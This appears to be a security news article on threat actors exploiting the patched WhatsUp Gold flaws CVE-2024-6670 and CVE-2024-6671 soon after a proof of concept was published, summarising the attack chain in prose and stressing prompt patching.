WhatsUp Gold Exploit: PoC Release Prevails As The Root Cause
As per recent media reports, a publicly available Proof-of-Concept (PoC) pertaining to Progess’s WhatsUp Gold is likely being used by threat actors for exploiting the software. Malicious activities are said to have started five hours after the PoC was released. In this article, we’ll dive into the details of the WhatsUp Gold exploit and learn more about the vulnerability.
WhatsUp Gold Exploit Uncovered
The recent exploitation of critical vulnerabilities in WhatsUp Gold pertains to two flaws being tracked as CVE-2024-6670 and CVE-2024-6671. Both the flaws have a critical vulnerability severity score (CVSS) of 9.8 and their discovery has been accredited to security researchers Sina Kheirkhah from the Summoning Team.
The interesting part about the WhatsUp Gold exploit is that both vulnerabilities pertaining to it were patched in mid-August, and the exploits started on August 30th. Commenting on the timeline of the attacks, Trend Micro researchers Hitomi Kimura and Maria Emreen Viray have stated that:
“The timeline of events suggests that despite the availability of patches, some organizations were unable to apply them quickly, leading to incidents almost immediately following the PoC’s publication.”
CVE-2024-6671 And CVE-2024-6670 Exploit Details
Based on the insights derived from the observed WhatsUp Gold exploit, it can be stated that authentication protocols pertaining to the software are bypassed first. Afterward, the aim of threat actors is to exploit the Active Monitor PowerShell Script to facilitate downloading various remote access tools that help develop persistence. Some of the tools include:
- Radmin.
- Atera Agent.
- Splashtop Remote.
- SimpleHelp Remote Access.
It’s worth mentioning here that both Atera Agent and Splashtop Remote are installed on a compromised system using a single MSI installer file, which hackers retrieve from a remote server. Providing details on the WhatsUp Gold executable file, researchers have said that:
“The polling process NmPoller.exe, the WhatsUp Gold executable, seems to be able to host a script called Active Monitor PowerShell Script as a legitimate function. The threat actors in this case, chose it to perform for remote arbitrary code execution.”
Continued Exploits Of Patched Flaws
As per recent reports, no follow-on exploitation attempts have been detected. However, the use of several remote access tools for exploits entails the involvement of a threat actor. It’s worth mentioning here that this is not an isolated incident. Critical vulnerabilities in WhatUp Gold have actively been exploited in the wild previously as well.
The Shadowserver Foundation, a non-profit security organization, early last month, has stated that it observed exploits pertaining to CVE-2024-4885. The vulnerability has a CVSS of 9.8 and is another flaw that Progress had patched in June 2024.
This disclosure came weeks after Trend Micro revealed exploits of a patch security flaw in the Atlassian Confluence Data Center and Confluence Server. The Atlassian vulnerability was tracked as CVE-2023-22527, had a CVSS of 10.0, and was exploited to deliver the Godzilla web shell.
Conclusion
Despite the availability of patches, critical vulnerabilities in WhatsUp Gold, like CVE-2024-6670 and CVE-2024-6671, continue to be exploited by threat actors. This WhatsUp Gold exploit highlights the importance of prompt patch management, as even minor delays can lead to significant security breaches and persistent threats. In addition, organizations should also emphasize the use of proactive security protocols to mitigate such threats.
The sources for this piece include articles in The Hacker News and Bleeping Computer.